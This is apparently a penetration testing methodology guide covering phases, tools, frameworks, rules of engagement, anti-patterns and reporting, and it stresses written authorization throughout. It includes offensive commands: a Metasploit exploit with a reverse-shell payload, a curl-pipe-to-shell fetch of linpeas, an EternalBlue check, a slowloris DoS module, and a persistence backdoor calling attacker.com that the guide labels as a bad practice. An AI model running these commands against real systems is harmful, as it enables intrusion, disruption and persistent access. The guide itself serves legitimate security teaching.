pentest methodology phases

- Bottom line: A structured penetration test follows five core phases -- reconnaissance, scanning, exploitation, post-exploitation, and reporting -- each using specialized tools and requiring explicit written authorization before any testing begins.

penetration testing steps and tools

- Bottom line: A structured penetration test follows five core phases -- reconnaissance, scanning, exploitation, post-exploitation, and reporting -- each using specialized tools and requiring explicit written authorization before any testing begins.

how to perform a penetration test

- Bottom line: A structured penetration test follows five core phases -- reconnaissance, scanning, exploitation, post-exploitation, and reporting -- each using specialized tools and requiring explicit written authorization before any testing begins.

PTES methodology overview

- Bottom line: A structured penetration test follows five core phases -- reconnaissance, scanning, exploitation, post-exploitation, and reporting -- each using specialized tools and requiring explicit written authorization before any testing begins.

OWASP testing guide methodology

- Bottom line: A structured penetration test follows five core phases -- reconnaissance, scanning, exploitation, post-exploitation, and reporting -- each using specialized tools and requiring explicit written authorization before any testing begins.

Penetration Testing Methodology: Phases, Tools, and Reporting Guide

What is the penetration testing methodology?

TL;DR

Bottom line: A structured penetration test follows five core phases -- reconnaissance, scanning, exploitation, post-exploitation, and reporting -- each using specialized tools and requiring explicit written authorization before any testing begins.
Key tool/command: nmap -sC -sV -O -T4 target for initial reconnaissance; msfconsole for exploitation; Burp Suite for web app testing.
Watch out for: Testing without written authorization (Rules of Engagement) is illegal regardless of intent -- always get sign-off before scanning a single port.
Works with: PTES, OWASP WSTG v4.2, NIST SP 800-115, OSSTMM 3, MITRE ATT&CK. Tools: Nmap 7.x, Metasploit 6.x, Burp Suite 2024.x+, Kali Linux 2024+.

Constraints

NEVER perform penetration testing without explicit written authorization (Rules of Engagement) from the system owner
All testing MUST stay within the defined scope -- attacking out-of-scope systems is unauthorized access
Credential harvesting, data exfiltration, and persistent backdoors require explicit pre-approval in the ROE
Production systems require extra caution -- destructive exploits (DoS, data corruption) need client sign-off
All findings MUST be reported, including accidental access to sensitive data (PII, credentials)
Comply with applicable laws: CFAA (US), Computer Misuse Act (UK), StGB 202a-c (DE) -- authorization does not override legal restrictions

Quick Reference

Penetration Testing Phases and Tools

#	Phase	Objective	Key Tools	MITRE ATT&CK Tactic	Deliverable
1	Pre-engagement	Define scope, ROE, timeline, emergency contacts	Contract templates, PTES pre-engagement checklist	--	Signed ROE document
2	Reconnaissance (OSINT)	Gather publicly available intel on target	Nmap, Shodan, theHarvester, Recon-ng, Google Dorks, WHOIS	Reconnaissance (TA0043)	Target profile document
3	Scanning & Enumeration	Identify live hosts, open ports, services, vulnerabilities	Nmap, Nessus, Nikto, Gobuster, enum4linux, SSLScan	Discovery (TA0007)	Port/service/vulnerability list
4	Vulnerability Analysis	Analyze scan results, prioritize exploitable vulns	Burp Suite, OWASP ZAP, Nuclei, searchsploit	--	Prioritized vulnerability matrix
5	Exploitation	Validate vulnerabilities by gaining access	Metasploit, Burp Suite Pro, SQLMap, Hydra, John the Ripper	Initial Access (TA0001), Execution (TA0002)	Proof of exploitation
6	Post-Exploitation	Assess impact: pivot, escalate privileges, exfil data	Meterpreter, BloodHound, Mimikatz, LinPEAS, WinPEAS	Privilege Escalation (TA0004), Lateral Movement (TA0008)	Impact assessment
7	Reporting	Document findings, risk ratings, remediation	Custom templates, Dradis, PlexTrac, Serpico	--	Executive + technical report
8	Remediation Verification	Retest after fixes are applied	Same tools as exploitation phase	--	Retest report

Testing Types

Test Type	Knowledge Level	Simulates	Best For
Black Box	No prior knowledge of target	External attacker	Realistic threat simulation
Grey Box	Partial knowledge (credentials, architecture docs)	Insider threat or compromised account	Efficient coverage of attack surface
White Box	Full access (source code, network diagrams, admin creds)	Comprehensive audit	Maximum vulnerability discovery

Major Frameworks Comparison

Framework	Focus	Phases	Strengths	Limitation
PTES	General pentest	7 (pre-engagement to reporting)	Most comprehensive, widely adopted	Not updated frequently
OWASP WSTG	Web application	12 testing categories	Deep web-specific guidance	Web-only scope
NIST SP 800-115	Government/compliance	4 (planning, discovery, attack, reporting)	Compliance-aligned, risk-based	Less tactical detail
OSSTMM 3	Operational security	6 channels	Metrics-driven (rav score)	Complex, less community support
MITRE ATT&CK	Adversary emulation	14 tactics, 200+ techniques	Maps to real-world TTPs	Framework, not step-by-step methodology

Decision Tree

START: What type of penetration test do you need?
├── Web application?
│   ├── YES → Follow OWASP WSTG v4.2 testing categories
│   │           Tools: Burp Suite, OWASP ZAP, Nikto, SQLMap, Gobuster
│   └── NO ↓
├── Network/infrastructure?
│   ├── YES → Follow PTES methodology + NIST SP 800-115
│   │           Tools: Nmap, Nessus, Metasploit, Responder, CrackMapExec
│   └── NO ↓
├── API testing?
│   ├── YES → OWASP API Security Top 10 + WSTG API sections
│   │           Tools: Burp Suite, Postman, Nuclei, ffuf
│   └── NO ↓
├── Cloud environment?
│   ├── YES → PTES + cloud-specific tools
│   │           Tools: ScoutSuite, Prowler (AWS), az-cli (Azure), CloudSploit
│   └── NO ↓
├── Wireless?
│   ├── YES → OSSTMM wireless channel + PTES
│   │           Tools: Aircrack-ng, Kismet, Wireshark, Wifite
│   └── NO ↓
└── DEFAULT → PTES general methodology + MITRE ATT&CK mapping

Step-by-Step Guide

1. Define scope and rules of engagement

Establish the legal and operational boundaries of the test. Document target systems, IP ranges, testing windows, emergency contacts, and explicitly forbidden actions. [src2]

# Rules of Engagement (ROE) checklist:
- [ ] Target IP ranges / domains / URLs (in-scope)
- [ ] Explicitly out-of-scope systems
- [ ] Testing window (dates, hours, timezone)
- [ ] Test type: black box / grey box / white box
- [ ] Allowed actions: scanning, exploitation, social engineering, DoS
- [ ] Data handling: what to do with discovered PII/credentials
- [ ] Emergency contacts (client POC, escalation path)
- [ ] Communication channels and frequency
- [ ] Signed authorization letter (legal protection)

Verify: Both parties have signed the ROE document. Keep a copy accessible during the entire engagement.

2. Perform passive reconnaissance (OSINT)

Gather publicly available information without directly interacting with the target. [src1]

# DNS enumeration
dig +short target.com ANY
# WHOIS lookup
whois target.com
# Subdomain enumeration
theHarvester -d target.com -b google,bing,linkedin -l 500
# Search for exposed services on Shodan
shodan search hostname:target.com

Verify: Target profile contains: IP ranges, subdomains, employee names/emails, technology stack, and exposed services.

3. Perform active scanning and enumeration

Directly probe the target to identify live hosts, open ports, running services, and their versions. [src6]

# Full port scan with service detection and OS fingerprinting
nmap -sC -sV -O -p- -T4 --open -oA full-scan target.com
# Top 1000 ports quick scan
nmap -sC -sV -T4 --top-ports 1000 -oN quick-scan.txt target.com
# Web directory brute-force
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -o dirs.txt
# Vulnerability scan with Nmap NSE scripts
nmap --script vuln -p 80,443,8080 target.com

Verify: cat full-scan.txt shows open ports, service versions, and OS detection results.

4. Analyze vulnerabilities and prioritize targets

Review scan results, research identified services for known CVEs, and build an exploitation plan. [src1]

# Search for known exploits
searchsploit apache 2.4
searchsploit openssh 8.
# Burp Suite: import target URL, run active scan on discovered endpoints

Verify: Vulnerability matrix created with: Vulnerability, CVE, CVSS Score, Affected Host/Port, Exploitation Feasibility.

5. Exploit validated vulnerabilities

Attempt to exploit confirmed vulnerabilities to prove impact. Document every step with timestamps and screenshots. [src5]

# Metasploit: search and use an exploit
msfconsole -q
msf6> search type:exploit name:apache
msf6> use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6> set RHOSTS target.com
msf6> set LHOST attacker-ip
msf6> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6> exploit

Verify: Successful exploitation produces a shell, extracted data, or modified state. Capture evidence.

6. Perform post-exploitation assessment

After gaining initial access, assess real-world impact: escalate privileges, move laterally, determine reachable data. [src2]

# Meterpreter post-exploitation
meterpreter> sysinfo
meterpreter> getuid
meterpreter> getsystem
meterpreter> run post/multi/recon/local_exploit_suggester
# Linux privilege escalation
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Verify: Document the maximum access achieved and what data was accessible. Record the full attack chain.

7. Write the penetration test report

Structure the report for two audiences: executives (risk/business impact) and technical teams (reproduction steps, remediation). [src3]

# Report structure:
1. EXECUTIVE SUMMARY (1-2 pages)
2. METHODOLOGY (framework, tools, limitations)
3. FINDINGS (per vulnerability: title, CVSS, PoC, impact, remediation)
4. REMEDIATION PRIORITY MATRIX
5. APPENDICES (scan output, tools, tester details)

Verify: Report includes executive summary, all findings with CVSS scores and PoC evidence, and prioritized remediation.

Code Examples

Bash: Automated Reconnaissance Script

#!/bin/bash
# Input:  target domain and output directory
# Output: reconnaissance files (subdomains, ports, services)

TARGET=$1
OUTDIR="${2:-./recon-$TARGET}"
mkdir -p "$OUTDIR"

echo "[*] Starting recon for $TARGET"
# Subdomain enumeration
subfinder -d "$TARGET" -silent -o "$OUTDIR/subdomains.txt"
# Resolve live hosts
cat "$OUTDIR/subdomains.txt" | httpx -silent -o "$OUTDIR/live-hosts.txt"
# Port scan live hosts
nmap -sC -sV -T4 --open -iL "$OUTDIR/live-hosts.txt" \
  -oA "$OUTDIR/nmap-scan" 2>/dev/null

Python: Nmap Scan Parser

# Input:  Nmap XML output file
# Output: structured list of hosts with ports and services
import xml.etree.ElementTree as ET

def parse_nmap_xml(xml_file: str) -> list[dict]:
    tree = ET.parse(xml_file)
    hosts = []
    for host in tree.getroot().findall("host"):
        addr = host.find("address").get("addr", "")
        ports = []
        for port in host.findall(".//port"):
            svc = port.find("service")
            ports.append({
                "port": int(port.get("portid", 0)),
                "state": port.find("state").get("state", ""),
                "service": svc.get("name", "") if svc else "",
                "version": svc.get("version", "") if svc else "",
            })
        hosts.append({"ip": addr, "ports": ports})
    return hosts

Python: Metasploit RPC Automation

# Input:  target IP and exploit module path
# Output: session ID if exploitation succeeds
import requests  # ^2.31.0

class MetasploitRPC:
    def __init__(self, host="127.0.0.1", port=55553, password="msf"):
        self.url = f"http://{host}:{port}/api/"
        resp = requests.post(self.url, json=["auth.login", password])
        self.token = resp.json()["token"]

    def run_exploit(self, module: str, options: dict) -> dict:
        return requests.post(self.url, json=[
            "module.execute", self.token, "exploit", module, options
        ]).json()
# Usage: msf = MetasploitRPC(password="your-rpc-password")

Anti-Patterns

Wrong: Scanning without authorization

# BAD -- scanning without written authorization is illegal
nmap -sV -p- production-server.company.com
# Even "just scanning" without permission violates CFAA, CMA, etc.

Correct: Verified scope before any scanning

# GOOD -- verify target is in scope before scanning
echo "[*] Confirming target is in ROE scope..."
grep -q "192.168.1.0/24" roe-scope.txt && \
  nmap -sC -sV -T4 192.168.1.0/24 -oA in-scope-scan || \
  echo "ERROR: Target not in scope. Aborting."

Wrong: Using destructive exploits without approval

# BAD -- DoS exploits without explicit approval
msf6> use auxiliary/dos/http/slowloris
msf6> set RHOSTS production.target.com
msf6> run
# This can crash production systems and cause business disruption

Correct: Non-destructive validation with documentation

# GOOD -- validate vulnerability without causing damage
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.100
msf6> check
# [*] 192.168.1.100:445 - The target is vulnerable.
# Document "check" output as proof -- only exploit with approval

Wrong: Skipping post-exploitation cleanup

# BAD -- leaving backdoors or artifacts on target
meterpreter> run persistence -X -i 10 -p 4444 -r attacker.com
# Persistent backdoors left on client systems create real security risk

Correct: Clean up all artifacts after testing

# GOOD -- remove all testing artifacts and document cleanup
# Cleanup checklist:
# - Remove uploaded tools (linpeas.sh, winpeas.exe, nc.exe)
# - Delete created user accounts
# - Remove cron jobs / scheduled tasks
# - Close reverse shells and tunnels
# - Document all artifacts and their removal status

Common Pitfalls

Incomplete scope definition: Vague scope leads to testing unauthorized systems. Fix: Enumerate every in-scope IP, domain, and URL in the ROE before starting. [src2]
Relying solely on automated scanners: Automated tools miss business logic flaws and chained vulnerabilities. Fix: Supplement automated scanning with manual testing and creative exploitation. [src1]
Not testing UDP ports: Many testers skip UDP scanning because it is slow. Fix: Scan at least top 100 UDP ports (nmap -sU --top-ports 100). [src6]
Reporting vulnerabilities without proof: Listing CVEs from a scanner without validation produces false positives. Fix: Validate every finding with a proof-of-concept. [src3]
Ignoring the human element: Many breaches start with social engineering. Fix: Include phishing simulation and physical access testing in scope (with ROE approval). [src4]
Forgetting authenticated testing: Unauthenticated scanning misses privilege escalation and IDOR vulnerabilities. Fix: Request test credentials for grey/white box tests. [src1]
Not mapping to business impact: Technical CVSS scores alone do not communicate risk. Fix: Translate every finding to business impact (data breach cost, regulatory fine). [src3]
Running scans during business hours: Aggressive scanning can trigger IDS alerts or crash services. Fix: Coordinate scanning windows and start with low-intensity scans (-T2). [src2]

Diagnostic Commands

# Verify Nmap is installed and check version
nmap --version

# Verify Metasploit is installed and check version
msfconsole --version

# Check if target host is reachable
ping -c 3 target.com

# Verify you can reach target ports
nmap -Pn -p 80,443 target.com

# Check your external IP (for reverse shell LHOST)
curl -s ifconfig.me

# Verify Burp Suite proxy is running
curl -x http://127.0.0.1:8080 -k https://target.com

# Test Metasploit database connectivity
msfconsole -q -x "db_status; exit"

# Check if required tools are installed
which nmap metasploit-framework nikto gobuster sqlmap hydra 2>/dev/null

Version History & Compatibility

Framework/Tool	Version	Status	Key Updates
PTES	v1.1	Current	Refreshed technical guidelines (2024)
OWASP WSTG	v4.2	Current	Updated testing categories for modern web apps
NIST SP 800-115	Rev 1	Current	Updated May 2021 -- federal standard
OSSTMM	3.02	Current	Last major update Dec 2010
MITRE ATT&CK	v16	Current	Quarterly updates with new techniques
Nmap	7.95	Current	New NSE scripts, improved OS detection
Metasploit	6.4	Current	EDR bypass modules, improved Linux privesc
Burp Suite	2024.x	Current	AI-driven scanning hints, smart fuzzing
Kali Linux	2024.4	Current	Updated tool repositories

When to Use / When Not to Use

Use When	Don't Use When	Use Instead
Validating security controls with simulated attacks	Only need to check for known CVEs in dependencies	Automated vulnerability scanning (Nessus, Trivy)
Compliance requires pentest (PCI DSS, SOC 2, ISO 27001)	Building security into new code during development	Secure SDLC (SAST/DAST in CI/CD pipeline)
Assessing real-world exploitability of vulnerabilities	Need continuous security monitoring	SIEM + EDR solution
Testing incident response readiness (red team exercise)	Target system is in active development with no stable release	Code review instead
Evaluating security after major infrastructure changes	Need to train developers on secure coding	Security training programs + code review

Important Caveats

Penetration testing is a point-in-time assessment -- it does not guarantee ongoing security. New vulnerabilities are discovered daily
Black box testing may miss vulnerabilities that grey/white box testing would find -- the test type should match the threat model
Automated exploitation tools (Metasploit, SQLMap) can cause unintended damage on fragile systems -- always use the check command before exploit
Social engineering tests (phishing, vishing) require separate authorization and may have HR/legal implications
Cloud environments (AWS, Azure, GCP) have their own penetration testing policies -- review and comply with provider rules before testing
Results depend heavily on tester skill level -- the same scope tested by a junior vs. senior pentester may yield very different findings
Zero-day vulnerabilities are generally not in scope for standard pentests -- they require specialized research or red team engagements